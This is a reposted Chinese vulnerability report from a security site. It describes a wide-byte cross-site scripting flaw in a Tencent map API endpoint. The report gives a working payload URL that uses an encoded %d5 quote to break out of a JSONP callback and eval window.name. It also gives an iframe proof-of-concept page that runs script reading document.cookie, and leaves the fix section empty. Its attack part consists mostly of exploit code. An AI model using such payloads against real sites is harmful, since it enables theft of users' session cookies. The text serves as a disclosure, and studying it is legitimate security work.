频道栏目
首页 > 安全 > 网站安全 > 正文
腾讯某接口宽字节XSS跨站可提Cookies
2016-02-19 09:21:43         来源:thx  
收藏   我要投稿

firefox、chrome测试效果:

https://qz6666.com/4.html
 

QQ图片20160103095048.jpg


 

QQ图片20160103094851.png



可以改编码和输出格式,主要是前后闭合,window.name省很多事。

https://api.map.qq.com/?qt=poi&c=825&l=11&wd=1111%d5%22}}});var%20e=eval;e(window.name);({none:{none:{//&pn=0&rn=10&output=html&fr=mapapi&cb=document.write&state=1
 

QQ图片20160103095939.png




 

4.html
<iframe name="alert(document.cookie)" src="https://api.map.qq.com/?qt=poi&c=825&l=11&wd=1111%d5%22}}});var%20e=eval;e(window.name);({none:{none:{//&pn=0&rn=10&output=html&fr=mapapi&cb=document.write&state=1">



 

漏洞证明:

firefox、chrome测试效果:

https://qz6666.com/4.html

 

QQ图片20160103095048.jpg



 

QQ图片20160103094851.png

 

修复方案:

 

</iframe>
点击复制链接 与好友分享!回本站首页
相关TAG标签 腾讯 字节 接口
上一篇:滴滴快的智能出行平台(苍穹)SQL注入漏洞
下一篇:真维斯某站getshell/影响内网多台主机
相关文章
图文推荐
点击排行

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站